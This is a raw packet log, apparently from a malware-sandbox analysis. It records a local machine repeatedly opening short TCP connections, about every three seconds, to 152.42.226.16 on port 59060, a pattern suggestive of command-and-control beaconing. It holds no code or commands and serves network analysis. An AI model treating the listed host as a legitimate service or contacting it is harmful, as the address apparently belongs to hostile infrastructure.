                          Dec 26, 2024 19:29:26.333434105 CET4982359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:26.349837065 CET5906049817152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:26.454288006 CET5906049823152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:26.454466105 CET4982359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:26.454684973 CET4982359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:26.574361086 CET5906049823152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:29.189400911 CET5906049823152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:29.189460039 CET4982359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:29.189522982 CET4982359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:29.302544117 CET4982959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:29.309094906 CET5906049823152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:29.422203064 CET5906049829152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:29.422276020 CET4982959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:29.422482967 CET4982959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:29.545082092 CET5906049829152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:32.103863001 CET5906049829152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:32.105460882 CET4982959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:32.105462074 CET4982959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:32.209331036 CET4983959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:32.225203037 CET5906049829152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:32.328928947 CET5906049839152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:32.329576015 CET4983959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:32.329576015 CET4983959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:32.450042009 CET5906049839152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:35.046013117 CET5906049839152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:35.046125889 CET4983959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:35.046247959 CET4983959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:35.162214994 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:35.165822983 CET5906049839152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:35.281780958 CET5906049846152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:35.281923056 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:35.282052994 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:35.401596069 CET5906049846152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:37.940637112 CET5906049846152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:37.940700054 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:37.940817118 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.053219080 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.062377930 CET5906049846152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:38.172900915 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:38.173069000 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.175260067 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.295310974 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:40.831753969 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:40.833436966 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:40.833533049 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:40.949373960 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:40.953280926 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:41.070861101 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:41.073452950 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:41.077363968 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:41.197103977 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.731386900 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.731451035 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.731550932 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.850842953 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.854172945 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.975255013 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.975339890 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.975519896 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:44.095278025 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.671401978 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.671468973 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.671612978 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.789351940 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.791106939 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.910106897 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.910197973 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.910454988 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:47.030015945 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.565959930 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.566009998 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.566128016 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.678575993 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.689160109 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.798221111 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.798290968 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.798528910 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.923557043 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.473210096 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.473411083 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.473582029 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.585360050 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.593095064 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.705117941 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.705255032 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.706290007 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.825978041 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.539190054 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.539263010 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.540455103 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.646775961 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.661164045 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.766330004 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.766413927 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.766638041 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.888631105 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.426526070 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.426728964 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.426814079 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.536645889 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.546593904 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.656606913 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.656872988 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.656970024 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.776513100 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.355679989 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.355750084 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.355839968 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.458798885 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.475378990 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.580722094 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.580812931 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.581043959 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.700673103 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.261286020 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.261831045 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.261929035 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.365428925 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.381567955 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.485116959 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.487509966 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.487708092 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.607249975 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.143734932 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.144331932 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.144526958 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.255527020 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.263931036 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.375387907 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.375474930 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.375737906 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.495448112 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.036117077 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.036173105 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.036263943 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.146622896 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.159163952 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.267723083 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.268042088 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.273402929 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.395725965 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:12.924824953 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:12.925060034 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:12.925060034 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.037429094 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.044684887 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:13.159260035 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:13.159411907 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.159877062 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.486232996 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.035536051 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.035599947 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.035732985 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.147144079 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.155189991 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.266839981 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.268884897 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.272543907 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.392177105 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:18.925544024 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:18.931746960 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:18.932109118 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.037403107 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.051522970 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:19.157145977 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:19.157583952 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.157583952 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.277087927 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:21.832463980 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:21.832539082 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:21.832581997 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:21.944772959 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:21.952322960 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:22.064637899 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:22.064740896 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:22.064928055 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:22.185148001 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.723762035 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.725469112 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.725579023 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.833586931 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.845232964 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.953109980 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.955570936 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.961429119 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:25.081486940 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.613040924 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.613095045 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.613149881 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.725446939 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.732889891 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.845037937 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.845117092 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.845325947 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.966254950 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.503401995 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.503530979 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.503642082 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.623066902 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.624186039 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.743916988 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.744081974 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.744345903 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.864121914 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.410553932 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.410619974 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.410713911 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.522068977 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.530293941 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.641638041 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.641710043 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.642071962 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.761821032 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.316817999 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.319540024 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.319622040 CET4998759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.430314064 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.461288929 CET5906049987152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.581005096 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:36.583951950 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.584374905 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:36.704761982 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.298399925 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.298481941 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.298763990 CET4999459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.413134098 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.418293953 CET5906049994152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.532872915 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:39.532941103 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.533180952 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:39.652695894 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.223833084 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.223933935 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.223985910 CET5000059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.337469101 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.343713045 CET5906050000152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.457485914 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:42.461509943 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.461770058 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:42.581305027 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.113858938 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.113944054 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.122766018 CET5000959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.241350889 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.243107080 CET5906050009152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.363455057 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:45.363562107 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.363850117 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:45.483381987 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.020108938 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.020190954 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.020288944 CET5001659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.131387949 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.186465979 CET5906050016152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.251367092 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:48.253293991 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.253293991 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:48.372956038 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:50.909996986 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:50.913583994 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:50.917469978 CET5002259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.022778988 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.036978006 CET5906050022152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:51.142822981 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:51.145656109 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.145812988 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:51.268532038 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:53.801824093 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:53.801887035 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:53.801969051 CET5002959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:53.912539005 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:53.921555042 CET5906050029152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:54.033088923 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:54.033155918 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:54.033323050 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:54.152776003 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.735111952 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.737649918 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.738687992 CET5003659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.849514961 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.858298063 CET5906050036152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.971518993 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:56.973634958 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:56.974014044 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:57.095529079 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.629878998 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.629939079 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.630018950 CET5004559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.741372108 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.749857903 CET5906050045152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.861047029 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:59.861116886 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.861352921 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:59.980786085 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.519850969 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.519994974 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.519994974 CET5005059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.630422115 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.659183025 CET5906050050152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.750138044 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:02.750293970 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.750802040 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:02.871299982 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.411786079 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.411870956 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.412240982 CET5005659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.521898031 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.532038927 CET5906050056152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.641504049 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:05.641573906 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.641815901 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:05.761378050 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.301745892 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.305535078 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.305648088 CET5006359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.413490057 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.425344944 CET5906050063152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.538296938 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:08.541639090 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.545495987 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:08.670759916 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:11.207623959 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:11.209608078 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.209608078 CET5006759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.319192886 CET5006859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.330179930 CET5906050067152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:11.439435005 CET5906050068152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:11.439524889 CET5006859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.439768076 CET5006859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:11.559969902 CET5906050068152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:14.098051071 CET5906050068152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:14.098124027 CET5006859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:14.099030018 CET5006859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:14.210242987 CET5006959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:14.218589067 CET5906050068152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:14.331023932 CET5906050069152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:14.335798025 CET5006959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:14.336307049 CET5006959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:14.455863953 CET5906050069152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:16.988807917 CET5906050069152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:16.988917112 CET5006959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:16.989059925 CET5006959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:17.101635933 CET5007059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:17.109639883 CET5906050069152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:17.221447945 CET5906050070152.42.226.16192.168.2.4
                          Dec 26, 2024 19:31:17.221600056 CET5007059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:17.221771002 CET5007059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:31:17.341250896 CET5906050070152.42.226.16192.168.2.4
